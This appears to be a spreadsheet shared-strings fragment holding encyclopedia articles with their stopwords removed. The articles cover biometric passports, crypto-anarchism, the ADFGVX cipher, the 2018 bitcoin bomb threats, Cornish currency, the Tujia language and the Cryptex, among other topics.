features recommended international civil aviation organization (icao) although security privacy concerns civil liberties groups remain.in 2007 norwegian government launched ‘multi-modal’ biometric enrolment system supplied motorola. motorola's system enabled multiple public agencies digitally capture store fingerprints, facial images signatures passports visas.steria idex leading biometrics software product manufacturers norway. tanzania tanzania began biometric voter registration (bvr) system february 2015 planned first constitutional referendum subsequent general elections. ukraine bill biometric passports approved ukraine's parliament february 2012. these passports used foreign travel only. internal passports biometric information. updated version passed verkhovna rada ukraine november 2012, taking account proposals made president, subsequently signed president. biometric passports conditions placed ukraine european union path easing visa requirements eventually moving towards visa-free regime these national cards valid years issued instead previous ukrainian passports were. verkhovna rada commissioner human rights, valeriya lutkovska, criticized “does comply constitution ukraine european standards sphere personal data protection, might infringe human rights freedom.” also criticized oleksandr hladun institute demography social studies ukraine. said adoption unified demographic register threatens create police state” ukraine, information collected person used without person’s knowledge.according law, ukrainian citizen, regardless age, obliged obtain passport. previous version ukrainian passports remain valid official expiration dates.ukraine's biometric passports came force december 2012. document foresees introduction electronic passports containing electronic chips biometric information traveling abroad, according standards international civil aviation organization (icao). according law, passports ukrainian citizens produced form cards contactless smart chips issued later calendar days date submission relevant application. electronic passports include name state, name document, full name holder, holder's sex, citizenship, date birth, unique number register, number document, document's date expiration, date issue document, name agency issued document, place birth, photo signature holder. information parents guardian holder included document upon relevant written request. president's request, provision included says people refuse enter personal information electronic chip religious beliefs right refuse document insertion information chip.the united nations high commissioner refugees suggested fully comply international standards. united kingdom united kingdom utilises biometrics epassport gates. swiss citizens aged over, addition people enrolled registered traveller scheme, able automated frontier gates airports. passport officers remain place epassport gates case passport cannot read traveller requires screening. fingerprint scanners used schools facilitate subtraction funds account financed parents payment school dinners. using system, nutritional reports produced parents survey child's intake. this raised questions liberty groups, claim system removes freedom choice young people. other concerns arise possibility data leaking providers school meals interest groups provide health services, insurance groups, detrimental effect ability individuals enjoy equality access services. united states starting 2005, passports facial (image-based) biometric data scheduled produced. privacy activists many countries criticized technology's potential harm civil liberties, privacy, risk identity theft. currently, apprehension united states (and european union) information "skimmed" identify people's citizenship remotely criminal intent, kidnapping.the department defense (dod) common access card, card issued service personnel contractors military sites. this card contains biometric data digitized photographs. also laser-etched photographs holograms security reduce risk falsification. there million cards issued.according wayman, director national biometric test center jose state university, walt disney world nation's largest single commercial application biometrics. however, us-visit program soon surpass walt disney world biometrics deployment. united states records fingerprints picture foreign airline passengers visiting u.s. (exempting canadians), keeping databases seventy-five years. suggested information shared among u.s. countries similar systems. privacy advocates worried data leakage misuse.nexus joint canada-united states program operated canada border services agency u.s. customs border protection. designed expedite travel cross us-canada border makes biometric authentication technology, specifically "iris recognition biometric technology". permits pre-approved members program self-serve kiosks airports, reserved lanes land crossings, phoning border officials entering water. february 2018, utah requires applicants non-real driver licenses provide fingerprints, california colorado fingerprint driver license applicants. countries biometric voter registration number countries adopting biometrics voting registration voting authentication steadily increased. 2016, half countries africa latin america technology elections. according international institute democracy electoral assistance’s icts elections database, cent surveyed electoral commissions capturing biometric data (such fingerprints photos) part voter registration process. also national biometric card cctv camera references</t>
  </si>
  <si>
    <t>Crypto-anarchism</t>
  </si>
  <si>
    <t>crypto-anarchism cyberanarchism political ideology focusing protection privacy, political freedom, economic freedom, adherents cryptographic software confidentiality security sending receiving information computer networks. 1988 "crypto anarchist manifesto", timothy introduced basic principles crypto-anarchism, encrypted exchanges ensuring total anonymity, total freedom speech, total freedom trade. terminology "crypto-" comes ancient greek κρυπτός kruptós, meaning "hidden" "secret". this different prefix employed words like 'crypto-fascist' 'crypto-jew' indicates identity concealed world; rather, many crypto-anarchists open anarchism promotion tools based cryptology. motives motive crypto-anarchists defend surveillance computer networks communication. crypto-anarchists protect government mass surveillance, prism, echelon, tempora, telecommunications data retention, warrantless surveillance controversy, room 641a, crypto-anarchists consider development cryptography main defense problems. anonymous trading bitcoin currency generated secured peer-to-peer networked devices maintain communal record transactions within system used crypto-anarchic context. adrian chen, writing york times, says idea behind bitcoin traced crypto anarchist manifesto. silk road example illegal drug market bitcoin accepted currency.assassination market tor-based darknet market operated self-described crypto-anarchist going pseudonym kuwabatake sanjuro. cyphernomicon, timothy suggests crypto-anarchism qualifies form anarcho-capitalism: what emerges unclear, think form anarcho-capitalist market system call "crypto-anarchy." another quote cyphernomicon defines crypto-anarchism. under title "what crypto anarchy?", writes: some believe various forms strong cryptography cause power state decline, perhaps even collapse fairly abruptly. believe expansion cyberspace, secure communications, digital money, anonymity pseudonymity, crypto-mediated interactions, profoundly change nature economies social interactions. governments hard time collecting taxes, regulating behavior individuals corporations (small ones least), generally coercing folks can't even tell continent folks also bell originator idea assassination politics cypherpunk technolibertarianism notes works citedmay, timothy (1994), cyphernomicon, archived original august 2013 further reading</t>
  </si>
  <si>
    <t>CryptoGraf</t>
  </si>
  <si>
    <t>cryptograf secure messaging application smartphones running symbian windows mobile. allows user compose send messages encrypted digitally signed using methods based s/mime standard. secure e-mail messaging supported. cryptographic algorithms supported cryptograf include aes, sha-256. public keys users stored "crypto contacts" list [1]. user sends encrypted recipient listed crypto contacts. keys must exchanged messages sent. crypto contact received determines trust level assigned key: high trust crypto contacts received bluetooth. medium trust crypto contacts received high trust contacts. trust crypto contacts received mms.the crypto contacts list based trust model similar trust known pgp. crypto contacts compatible x.509 digital certificates contain (1024/2048 bit) public keys. messages encrypted using aes-256 digitally signed using (1024/2048 bit) sha-256. cryptograf integrated standard messaging application symbian windows mobile stores messages default inbox, sent folders. cryptograf press cryptograf attention local newspaper first release. nation, january 2007. data-encryption firm upbeat bangkok post, january 2007. mobile encryption solution also s/mime public infrastructure random number generator x.509 trust external links cryptograf website cryptograf documentation cryptograf</t>
  </si>
  <si>
    <t>2018 Bitcoin bomb threats</t>
  </si>
  <si>
    <t>december 2018, thousands businesses, individuals, schools, news agencies, places throughout united states, canada, australia received emailed bomb threats, warning "mercenary" sender email placed bomb receiver's workplace demanding ransom $20,000 sent bitcoin address prevent bomb detonated. schools australia's capital city canberra evacuated threats. explosive stated used bomb, along bitcoin address, varied emails. police departments york city, oklahoma city, massachusetts, calgary, among areas united states canada, stated threats likely credible explosive devices found threatened areas.on december jaeson schultz cisco talos wrote bitcoin addresses associated bomb threats received transactions, also wrote group behind earlier sextortion scheme profitable started making threats throwing acid onto individual recipients.in january 2019, anti-spam researcher ronald guilmette found godaddy security weakness exploited help spam campaign. also 2017 jewish community center bomb threats october 2018 united states mail bombing attempts references</t>
  </si>
  <si>
    <t>Trouw</t>
  </si>
  <si>
    <t>trouw (dutch pronunciation: [trʌu] (listen); lit. "loyal", "true") dutch daily newspaper appearing compact size. founded 1943 orthodox protestant underground newspaper world since 2009, owned media (known persgroep 2019). trouw received european newspaper award 2012. cees laan current editor-in-chief. history trouw dutch word meaning "fidelity", "loyalty", "allegiance", cognate english adjective "true". name chosen reflect allegiance loyalty country spite german occupation netherlands. trouw started world members dutch protestant resistance. hundreds people involved production distribution newspaper arrested killed war. newspaper published irregularly lack paper. 1944 nazi occupying forces tried stop publication rounding imprisoning couriers. they issued ultimatum leaders trouw; however, editors give captured couriers executed. amongst people lost life involvement newspaper trouw co-founder resistance member speelman.after paper became daily, allegiance reformed churches netherlands. 1967, though, paper's chief editor made clear trouw considered paper christians: wanted paper everyone. course time percentage trouw readers belong reformed churches shrank considerably: 1965 readers belonged churches, 1979 dropped 48%, 1999 28%. words, 2005, intended "remain newspaper rooted christian tradition source contemplation inspiration everyone, churchgoer not, feels need moral spiritual orientation."circulation 20th century little 133,000. february 2005, trouw changed format broadsheet compact.today, trouw part persgroep nederland, name given former group belgian publishing house persgroep bought majority stake summer 2009. handelsblad, parool volkskrant also owned persgroep nederland. handelsblad sold summer 2010. references external links official website dutch) illegale trouw dutch), underground issues 1943–1945</t>
  </si>
  <si>
    <t>Cost-based anti-spam systems</t>
  </si>
  <si>
    <t>since spam occurs primarily cheap send, proposed solutions require senders cost order send spam, making prohibitively expensive spammers. stamps some gatekeeper would sell electronic stamps keep proceeds. micropayment, electronic money would paid sender recipient isp, gatekeeper. proof-of-work systems proof-of-work systems hashcash penny black require sender computational cost performing calculation receiver later verify. verification must much faster performing calculation, computation slows sender significantly impact receiver. point slow machines send spam—often millions millions them. while every user wants send email moderate number recipients suffers seconds' delay, sending millions emails would take unaffordable amount time. this approach suffers sender maintains computation farm zombies. bonds sender-at-risk refinement stamp systems method requiring micropayment made form penalty imposed) recipient considers email abusive. this addresses principal objection stamp systems: popular free legitimate mailing list hosts would unable continue provide services postage every message sent. 2004 bill gates announced microsoft working solution requiring so-called “unknown senders”, i.e. senders accepted list recipient post “the electronic equivalent stamp whose value would lost sender recipient disapproves email. gates said microsoft favors solutions short-term, would rely contingent payment solution solve spam problem longer run. microsoft, well yahoo! recently introduced systems allow commercial senders avoid filters obtain paid pre-paid certificate certification, lost sender recipients complain. this approach suffers user initially signs legitimate mailing list, later decides want receive e-mail further. lazy users simply click "this spam" button e-mail client, rather going formal unsubscription process detailed bottom message. end-user gets effect either way, without realizing consequences list host face. however, companies implementing penalty approach certifying (and withdrawing certification from) commercial senders learned account problem setting appropriate complaint thresholds. intent "sender-at-risk" solutions, impose significant cost sender recipient rejects message subsequent receiving email, deter spam making economically prohibitive send unwanted email messages, allowing legitimate emailers send messages little expense. suing spammers anti-spam activist daniel balsam attempts make spamming less profitable bringing lawsuits spammers. while approach financially sustainable activist, questionable whether actually reduces spam, either activist anyone else. references</t>
  </si>
  <si>
    <t>Cornish currency</t>
  </si>
  <si>
    <t>currency, form coins, issued cornwall periodically since least 10th century banknotes issued 19th century. cornish mints earliest known cornish mint launceston (originally stephen launceston), operated minimal scale time ethelred (that cornwall received full diocesan jurisdiction year ad). only specimen, heavy (1.61 coin, known exist. after norman conquest, robert, count mortain (william conqueror's half-brother) given much cornwall, including dunheved rebuilt castle there. expropriated market mint canons stephen townspeople followed dunheved. mint reopened halfway conqueror's reign.another early reference cornish currency, "dynar," found thirteenth-century cornish play containing line "dhodh dela pymp cans dyner", translates owed five hundred dyner." english coin time silver penny: presumably dynar equivalent this. royalist mint established truro 1642-43 english civil richard vyvyan; september 1643 moved exeter. cornish banks several cornish towns mining districts banks even issued banknotes. example 'the mounts commercial bank' 1807 bolitho family penzance. consolidated bank cornwall taken barclays bank 1905. 2004 rare banknote falmouth bank sold £540. several examples cornish banknotes held county museum truro. stannary money recent times cornish currency issued cornish stannary parliament 1974 name 'cornish national fund'. cornish national fund established objective raising funds assist "campaign restitution cornwall’s legal right partially govern raise appreciation within cornwall aims stannary parliament."the 1974 banknotes issued denominations shillings, shillings, pound pounds. cornish language text front shilling note translated 'the national fund cornwall promises bearer sight amount five shillings.' 1985 cornish stannary parliament issued notes denominations pence pound—and sold premium matching pair fund raising exercise. 2000 revived cornish stannary parliament issued banknotes denomination dynars commemorate 200-year anniversary richard trevithick's steam climbing camborne hill christmas 1801. front note depiction saint piran (peran sans), carrying banner standing stone cross.on december 1974, announced frederick trull, styled "clerk stannary", issue banknotes four denominations. following incident february 1975 trull attempted arrest clerk magistrate tried motoring offence austell magistrate's court, found guilty using threatening words behaviour intent provoke breach peace june 1975. produced twenty-five pages documents attempt prove court jurisdiction fined, ordered costs, bound keep peace twelve months. subsequently dismissed post clerk stannary expelled organisation. banknotes, bore trull's signature, burnt. cornish tokens cornish tokens sometimes called cornish pennies trade tokens widely used 18th 19th century cornwall. dated 1811 words, "for accommodation county," centre pilchard cakes copper ingots tin. side words cornish penny, centre view mine pumping engine winding gear. 1791 cornwall conder token, (halfpenny) "cornish copper half ounce" written around duchy bezant shield druid's head reverse. cornish pennies issued john williams scorrier house also found: dated 1812 obverse badge prince wales (three plumes) reverse view mine pumping engine winding gear "payable scorrier house pound tokens". also william john hocking royal mint references bibliography williams, (1971) cornish tokens. truro: bradford barton isbn 0-85153-018-4 external links cornish national fund currency 1974 1985 private issues cornish stannary parliament famous people polperro zephania information german sub-currencies cornish coins currency article george care kates paper money cornish community currency 1974 issue</t>
  </si>
  <si>
    <t>A-1 (code)</t>
  </si>
  <si>
    <t>designation code used united states navy world replaced secret code 1887, sigcode another system designed radio communication. cryptographic system developed w.w. smith office naval operations randomly associating words letter patterns. references</t>
  </si>
  <si>
    <t>CryptoNote</t>
  </si>
  <si>
    <t>cryptonote application layer protocol designed cryptocurrencies aims solve specific problems identified bitcoin. namely: traceability transactions proof-of-work function (see bitcoin network) irregular emission hardcoded constants bulky scripts financial privacy protocol powers several decentralized privacy-oriented cryptocurrencies, including monero, mobilecoin safex cash.nothing known original author cryptonote, "nicolas saberhagen." mathematical component motivation described article "cryptonote whitepaper", released editions: 2012 2013. launched summer 2012, bytecoin first cryptocurrency technology. later, several teams launched networks, based bytecoin code. emission just like bitcoin, miners rewarded finding solutions. stepped release curve characteristic bitcoin replaced smooth cryptonote: reward decreases block. implementation cryptonote protocol resulted non-smooth emission curve, specifically, s-curve safex blockchain, designed match diffusion innovations technology adoption curve theory. also monero (cryptocurrency) references</t>
  </si>
  <si>
    <t>CryptoParty</t>
  </si>
  <si>
    <t>cryptoparty (crypto-party) grassroots global endeavour introduce basics practical cryptography anonymity network, i2p, freenet, signing parties, disk encryption virtual private networks general public. project primarily consists series free public workshops. history successor cypherpunks 1990s, cryptoparty conceived late august 2012 australian journalist asher wolf twitter post following passing cybercrime legislation amendment bill 2011 proposal two-year data retention country, cybercrime legislation amendment bill 2011. diy, self-organizing movement immediately went viral, dozen autonomous cryptoparties organized within hours cities throughout australia, germany. many parties soon organized held chile, netherlands, hawaii, asia, etc. usage australia spiked, cryptoparty london attendees—some veterans occupy london movement—had moved london hackspace google campus east london's tech city. mid-october 2012 cryptoparties held globally, continuing basis, cryptoparties held reykjavik, brussels, manila.the first draft 442-page cryptoparty handbook (the hard copy available cost) pulled together three days using book sprint approach, released 2012-10-04 cc-by-sa license. edward snowden involvement 2014, wired reported edward snowden, employed dell contractor, organized local cryptoparty small hackerspace honolulu, hawaii december months becoming well known leaking tens thousands secret u.s. government documents. during cryptoparty, snowden taught hawaii residents encrypt hard drives internet anonymously. event filmed snowden's then-girlfriend, video never released online. follow-up post cryptoparty wiki, snowden pronounced event "huge success." media response cryptoparty received early messages support electronic frontier foundation (purportedly) anonyops, well whistleblower thomas drake, wikileaks central editor heather marsh, wired reporter quinn norton. eric hughes, author cypherpunk's manifesto nearly decades before, delivered keynote address, putting personal back personal computers, amsterdam cryptoparty 2012-09-27. marcin kaminski, founding member piratbyrån turn founded pirate bay, regards cryptoparty important civic project cryptography today, cory doctorow characterized cryptoparty "like tupperware party learning crypto." spiegel december 2014 mentioned "crypto parties" wake edward snowden leaks article nsa. also cyber self-defense references external links cryptoparty wiki another cryptoparty wiki australian crypto primer preso beginning cryptoparty london's slideshow eric hughes's keynote address amsterdam cryptoparty asher wolf privacy concerns origin spread cryptoparty democratic socialists america's information security recommendations</t>
  </si>
  <si>
    <t>Tudor Scan Tech</t>
  </si>
  <si>
    <t>tudor scan tech swiss company manufactures aircraft cargo scanners, including x-ray scanners robotic scanning systems. company founded 2014 mircea tudor currently headquartered saint-imier, switzerland. tudor scan tech incorporates mbtelecom ltd, romanian company developing high technologies security industry, also heps customs border officials check illegal weapons, contraband, explosive materials. they grand prix international exhibition inventions thrice, 2009, 2013 2014. company also wipo awards 2009, organized world intellectual property organization. history tudor scan tech (tst) founded mircea tudor 2014, switzerland, forming group companies romanian company mbtelecom ltd. (mbt) founded 1994 mircea tudor. group companies designs manufactures inspection scanners, including x-ray, linear accelerators gamma scanning system aircraft, cargo, containers, occupied cars vans, heavy vehicle border control.in 2009, group started develop first ever non-intrusiveness inspection technology, roboscan aeria. company awarded 2009 grand prix 37th international exhibition inventions geneva invention first robotic mobile scanner trucks containers. during year, company also world intellectual property organisation award. company nominated awarded grand prix 41st international exhibition inventions geneva first scanner civil military aircraft.in 2013, launched plant worth million euros increase airplane scanners production.tudor scan tech also strategic security partner international transport association (iata). roboscan aeria roboscan aeria patented design aircraft security inspection developed inside group mbt-tst. roboscan aeria designed scan detect threats, illegal undeclared goods within aircraft. scanning process remotely operated without human exposure ionizing radiations. radiography detects object resolution first scanner installed bucharest's henri coanda airport. awards grand prix 41st international exhibition inventions geneva (2013) grand prix 42nd international exhibition inventions geneva (2014) gold medal international warsaw invention show (2009) wipo award world intellectual property organization award best inventor (2009) grand prix 37th international exhibition inventions geneva (2009) gold medal 37th international exhibition inventions geneva (2009) gold medal international invention fair middle east kuwait (2008) external links official website references</t>
  </si>
  <si>
    <t>ABC (stream cipher)</t>
  </si>
  <si>
    <t>cryptography, stream cypher algorithm developed vladimir anashin, andrey bogdanov, ilya kizhvatov, sandeep kumar. submitted estream project ecrypt network. references</t>
  </si>
  <si>
    <t>ADFGVX cipher</t>
  </si>
  <si>
    <t>cryptography, adfgvx cipher manually applied field cipher used imperial german army world used transmit messages secretly using wireless telegraphy. adfgvx fact extension earlier cipher called adfgx first used march 1918 german western front. adfgvx applied june 1918 western front eastern front. invented germans signal corps officers lieutenant fritz nebel (1891–1977) introduced march 1918 designation "secret cipher radio operators 1918" (geheimschrift funker 1918, short gedefu 18), cipher fractionating transposition cipher combined modified polybius square single columnar transposition. cipher named possible letters used ciphertext: letters chosen deliberately different another morse code. that reduced possibility operator error. nebel designed cipher provide army move encryption convenient trench codes still secure. fact, germans believed adfgvx cipher unbreakable. operation plaintext message, "attack once", secret mixed alphabet first filled polybius square: combined make alphabet grid. using square, message converted fractionated form: first letter ciphertext pair row, second ciphertext letter column, plaintext letter grid (e.g., "af" means "row column grid"). next, fractionated message subject columnar transposition. message written rows transposition (here "cargo"): _________ next, letters sorted alphabetically transposition (changing cargo acgor) rearranging columns beneath letters along letters themselves: _________ then, read columns, keyword order, yields ciphertext: faxdf adddg dgfff afax afafx practice, transposition keys dozen characters long. long messages sent adfgx cipher broken sets messages different irregular lengths make invulnerable multiple anagramming. both transposition keys fractionation keys changed daily. adfgvx june 1918, additional letter, added cipher. that expanded grid allowing characters used. that allowed full alphabet (instead combining digits that mainly effect considerably shortening messages containing many numbers. cipher based letters adfgvx. following example alphabet coded dutch codeword 'nachtbommenwerper'. this results alphabet: nachtbomewrpdfgijklqsuvxyz. digits inserted first occurrences letters (1), (0). this creates table letters adfgvx column headings identifiers: text 'attack 1200am' translates this: then, table created heading. let's 'privacy' key. usually much longer keys even phrases used. columns sorted alphabetically, based keyword, table changes this: then, appending columns results ciphertext: dgdd dagd dgaf addf dadv dvfa advx with keyword, columns reconstructed placed correct order. when using original table containing secret alphabet, text deciphered. this cipher might modified transposing rows well columns, creating harder improved cipher. cryptanalysis adfgvx cryptanalysed french army lieutenant georges painvin, cipher broken early june 1918. work exceptionally difficult standards classical cryptography, painvin became physically method solution relied finding messages stereotyped beginnings, would fractionate form similar patterns positions ciphertext corresponded column headings transposition table. (considerable statistical analysis required step reached, done hand.) thus effective times high traffic, also important messages sent. however, trick painvin used crack adfgx cipher. also used repeating sections ciphertext derive information likely length used. where even number letters length knew, message enciphered, column consisted entirely letter coordinates taken polybius square left square, mixture two. also, substitution transposition, columns would alternately consist entirely "top" "side" letters. characteristics frequency analysis letters distributions individual letters vary widely norm, averages dictates groups letters vary less. with adfgx cipher, "side" letter "top" letter associated five plaintext letters. example above, "side" letter associated plaintext letters "top" letter associated plaintext letters since groups five letters different cumulative frequency distributions, frequency analysis letter columns consisting "side" letters distinctively different result letter columns consisting "top" letters. that trick allowed painvin guess columns consisted "side" letters columns consisted "top" letters. could pair perform frequency analysis pairings pairings noise corresponding plaintext letters. once proper pairings, could frequency analysis figure actual plaintext letters. result still transposed, unscramble simple transposition still once determined transposition scheme message, would able crack message enciphered transposition key.painvin broke adfgx cipher april 1918, weeks germans launched spring offensive. direct result, french army discovered erich ludendorff intended attack. french concentrated forces point, claimed stopped spring offensive. however, claim painvin's breaking adfgx cipher stopped german spring offensive 1918, frequently made, disputed some. 2002 review sophie lastours' book subject, france gagne guerre codes secrets 1914-1918, journal intelligence history, (journal intelligence history: volume number winter 2002) hilmar-detlef brückner stated: regrettably, sophie lastours subscribes traditional french view solving german adfgvx-telegram painvin beginning june 1918 decisive allied victory first world gave timely warning forthcoming german offensive meant reach paris inflict critical defeat allies. however, known many years, german gneisenau attack june staged induce french high command rush reserves area north, germans intended attack later grossly exaggerated, german high command spreading rumors attack heading paris beyond; disinformation effective apparently still however, german offensive successful french enough reserves hand stop assault need bring additional reinforcements. moreover, usually overlooked basic version adfgvx cipher created especially german spring offensive 1918, meant deal allies devastating blow. hoped cipher adfgx would protect german communications allied cryptographers assault, happened. telegrams adfgx appeared first time march, german attack started march. when painvin presented first solution code april, german offensive already petered out. adfgx adfgvx ciphers regarded insecure. references sources childs, rives, general solution adfgvx cipher system, aegean park press, isbn 0-89412-284-3. friedman, william military cryptanalysis, part transposition fractionating systems. laguna hills, california: aegean park press, 1992. external links javascript implementation adfgvx cipher another javascript implementation implementation adfgvx cipher</t>
  </si>
  <si>
    <t>Trust anchor</t>
  </si>
  <si>
    <t>cryptographic systems hierarchical structure, trust anchor authoritative entity trust assumed derived.in x.509 architecture, root certificate would trust anchor whole chain trust derived. trust anchor must possession trusting party beforehand make certificate path validation possible. most operating systems provide built-in list self-signed root certificates trust anchors applications. firefox browser also provides list trust anchors. end-user operating system browser implicitly trusting correct operation software, software manufacturer turn delegating trust certain cryptographic operations certificate authorities responsible root certificates. references</t>
  </si>
  <si>
    <t>Tujia script</t>
  </si>
  <si>
    <t>tujia language (northern tujia: bifzivsar, /pi35 ʦi55 sa21/; southern tujia: mongrzzirhof, /mõ21 ʣi21 ho35/; simplified chinese: 土家语; traditional chinese: 土家語; pinyin: tǔjiāyǔ) sino-tibetan language spoken natively tujia people hunan province, china. unclassified within sino-tibetan language family, pervasive influence neighboring languages. there mutually unintelligible variants, northern southern. both variants tonal languages tone contours (55, 21). northern tujia initials, whereas southern tujia (with additional voiced initials). finals, northern tujia southern tujia used exclusively loanwords chinese. verbs make distinction active passive voices. pronouns distinguish singular plural numbers along basic possessive cases. 2005, number speakers estimated 70,000 northern tujia monolingual) 1,500 southern tujia, ethnic population million. names tujia autonyms include pi35 tsi55 kʰa21 [毕孜卡] (pi21 tsi21 kʰa21 1995) mi35 tɕi55 kʰa33/55 tujia people call language "pi35 tsi55 sa21"."tujia" (土家) literally means 'native people', appellation chinese given aboriginal status area. tujia, hand, call chinese "kejia" (客家), designation also given hakka people, means 'guest people'. tujia also called "bizic" zhou. classification tujia clearly sino-tibetan language, position within family unclear, massive borrowing sino-tibetan languages. although placed groups past, linguists generally leave unclassified. subdivisions tujia divided major dialects. northern dialect vast majority speakers, southern dialect spoken villages tanxi township (潭溪镇) luxi county. almost tujia speakers located xiangxi tujia miao autonomous prefecture. northern (biji 毕基): baojing county, longshan county, guzhang county, yongshun county hushi (互士语) (虾语) shasha (沙沙语) southern (mengzi 孟兹): tanxi township (潭溪镇) luxi countythe tujia-speaking areas longshan county mostly located around xiche river 洗车河. variety studied tian (1986) dianfang township 靛房乡, longshan county. focuses northern variety xinghuo village 星火村, miao'ertan township 苗儿滩镇 (formerly miaoshi 苗市), longshan county 龙山县. peng covers northern variety yongshun county. brassett based tujia data primarily variety tasha township 他砂乡, longshan county also partly pojiao township dianfang township 靛房乡. focuses variety xianren township 仙仁乡, baojing county. zhang (2006) covers northern tujia dialect duogu village 多谷村, longshan county southern tujia dialect poluozhai 婆落寨, luxi county. chen (2006) chen kang divides tujia follows. northern longshan dialect 龙山土语 (autonym: pi35tsi55 kʰa21 bifzivkar) spoken longshan county: jiashi zan'guo miaoshi pojiao mengxi tasha shuiba guanping neixi ganxi dianfang laifeng county, hubei: maodong yongshun county: shaoha liexi duishan gaoping taiping guzhang county: qietong tianjiadong baojing dialect 保靖土语 (autonym: mi35tɕi55 kʰa21 mifqivkar) spoken baojing county: bamao bi'er mawang angdong longshan county: yanchong southern spoken following villages tanxi township 潭溪乡, luxi county:xiadu (tujia: tsʰie21 bu21 cirbur) puzhu (tujia: pʰu33 dzɯ33 puzzu) boluozhai (tujia: bo33 lo33 tsai13 bolozaif) qieji (tujia: tsʰa33 dʑi35 ciejif) xiaqieji (tujia: tsʰa33 dʑi35 di35 ciajifafdif) daboliu (tujia: tsʰie21 dɯ55 pʰo21 cierduovpor) xiaolingzhai (tujia: tsʰie55 ȵĩ35 sa33 ciernifsa) limuzhai (tujia: li21 mu21 tsai13 livmuvzaif) tumazhai (tujia: tʰɯ13 ma21 tsai13 tufmavzaiv) tanxi town (tujia: hu33 dɯ33 huduo) yang (2011) yang zaibiao reports tujia spoken natural villages comprising administrative villages townships. northern tujia autonym pi˧˥ tsɿ˥ kʰa˨˩, southern tujia autonym mõ˨˩ dzɿ˨˩. yang covers northern tujia dialects dianfang xiaolongre 小龙热, southern tujia dialect qieji longshan county (southeastern; townships): xichehe 洗车河镇, longtou 隆头镇, miao'ertan 苗儿滩镇, dianfang 靛房镇, luota 洛塔乡, ganxi 干溪乡, mengxi 猛西乡, fengxi 凤溪镇, pojiao 坡脚乡, tasha 他砂乡, neixi 内溪乡, jiashi 贾市乡, yanchong 岩冲乡, changxi 长潭乡, liye yongshun county (western; townships): duishan 对山乡, heping 和平乡, xiqi 西歧乡, shouche 首车镇, shaoha baojing county (western southeastern; townships): western baojing county: longtou 隆头乡, bi'er 比耳乡, mawang 马王乡, bamao 拔茅镇, purong 普戎镇, angdong 昂洞乡, longxi 龙溪乡, boji southeastern baojing county: tuzha 涂乍乡, xianren guzhang county (northwestern; townships): qietong (including xiaolongre 小龙热村 ɕiao55 lũ21 ze55), duanlong luxi county township): tanxi (including qieji tsʰa33 dʑi35 tsʰe5533 dʑi21) laifeng county township): hedong phonology consonants following consonants northern southern tujia dialects: voiced plosives affricates, occur southern tujia dialects. free variation. allophone /n/. allophones /u/. vowels combinations oral vowels nasal vowel /æ̃/ occur southern dialects. combinations vowels coda occur northern dialects. orthography (1995) system writing tujia latin script based hanyu pinyin uses letters tone markers, namely, brassett, brassett, (2006) philip brassett, cecilia brassett meiyan proposed experimental pinyin orthography tujia language, follows: tujia numerals possible ancient tujia script tujia known ethnic minority (historically) without written language. however, succession ancient undeciphered books glosses presented chinese characters found youyang tujia habitation straddling borders hunan, hubei, guizhou provinces chongqing city. language preservation although small percentage tujia people speak tujia language, tujia language enthusiasts work hard preserve hunan hubei. according news reports, tujia language instruction books published work continues tujia dictionary. tujia language scholar yongming (储永明) works children baifusi ethnic minorities school (百福司民族小学) baifusi town, laifeng county, hubei promote language use. references bibliography brassett, philip; brassett, cecilia; meiyan (2006). tujia language. languages world/materials. vol. 455. munich: lincom europa. isbn 9783895869952. chen, kang [陈康] (2006), 土家语研究 study tujia], beijing: minzu university. dai, qinxia [戴庆厦] (2005), 仙仁土家语研究 study xianren tujia], beijing: minzu university. peng, [彭勃] (1998), 土家语研究及实录 [tujiayu yanjiu shilu], yongshun county ethnic affairs bureau [永顺县民族事务委员会]. tian, desheng [田德生] (1986), 土家语简志 sketch tujia], beijing: ethnic publishing house [民族出版社]. deshu [叶德书] (1995), 土家语研究 study tujia]. yang, zaibiao [杨再彪] (2011). 湖南西部四种濒危语言调查] [four endangered languages hunan province]. beijing: ethnic publishing house [民族出版社].. yao, yuanshen [姚元森] (2013), 母语存留区龙山坡脚的土家语口语 [muyu cunliuqu longshan pojiao tujiayu kouyu], beijing: ethnic publishing house [民族出版社]. xiang, kuiyi [向魁益] (2012), 保靖县土家语实录 [baojing tujiayu shilu], hunan normal university press [湖南师范大学出版社]. zhang, [张军] (2006), 土家语语音硏究 [phonological study tujia language] (ph.d. dissertation), hong kong university science technology, hdl:1783.1/2836. external links zhou, yulou; hill, nathan (2021), collection north tujia (bifzivsar 北部土家语) vocabulary textual passages (data set), doi:10.5281/zenodo.4447924 tujia basic lexicon global lexicostatistical database elar archive documentation southern tujia language china brassett, philip; brassett, cecilia (2004). "tujia language culture". archived original july 2012. proto-tujia reconstruction (sino-tibetan branches project)</t>
  </si>
  <si>
    <t>Cryptex</t>
  </si>
  <si>
    <t>word cryptex neologism coined author brown 2003 novel vinci code, denoting portable vault used hide secret messages. word formed greek κρυπτός kryptós, "hidden, secret" latin codex; title device" since uses "the science cryptology protect information written contained scroll codex" novel). first physical cryptex created justin kirk nevins 2004. design function (first) cryptex featured novel vinci code described stone cylinder comprising "five doughnut-sized disks marble [that] stacked affixed another within delicate brass framework"; caps make impossible inside hollow cylinder. each disks carved entire alphabet rotated independently others create different letter-alignment combinations, including limited words, initialisms, anagrams. although clear whether alphabet question preserves and/or distinctions and/or includes letter alignment disks respect considered, number potential combinations (279,841) (456,976); mechanism treats combinations disk alignment different degrees rotation around cylinder's long axis distinct, multiple-wheel combination lock slot machine employing indicator along specified numbers aligned, number rises (6,436,343) (11,881,376). cryptex works "much like bicycle's combination lock", arranges disks spell correct password, "the tumblers inside align, entire cylinder slides apart" 200). inner compartment cryptex, secret information hidden, written scroll thin papyrus wrapped around fragile vial vinegar security measure: know password tries force cryptex open, vial break vinegar dissolve papyrus read. popular culture season episode series parks recreation, helps open cryptex leslie given elaborate valentine's scavenger hunt. "the brothers grimoire", second-season episode american series witches east end, dash killian inherit cryptex mother. american reality series treasure hunters, nested cryptex among puzzles challenged contestants, used finale. "phased confused", season episode american series eureka, nearly-unbreakable cryptex hidden underground bunker. episode south korean variety show running man, cast members must find clues attached staff members open cryptex. "down rabbit hole", fourth season episode american series vampire diaries, depicts sword cryptex hilt. "the blame game", season episode american series castle, puzzles characters need solve involves cryptex. "valley wolves", head mafia cryptex store diary narrating actions political connections. version tomb raider: anniversary features cryptex puzzles lara croft must solve activate certain mechanisms. solution cryptex puzzle found vicinity, lara takes rubbing player given limited number disk rotations reproduce solution cryptex resets. difficult puzzles, rotating disk cause disks rotate simultaneously. 2009 first-person shooter conduit features hidden "pyramid lock" puzzles 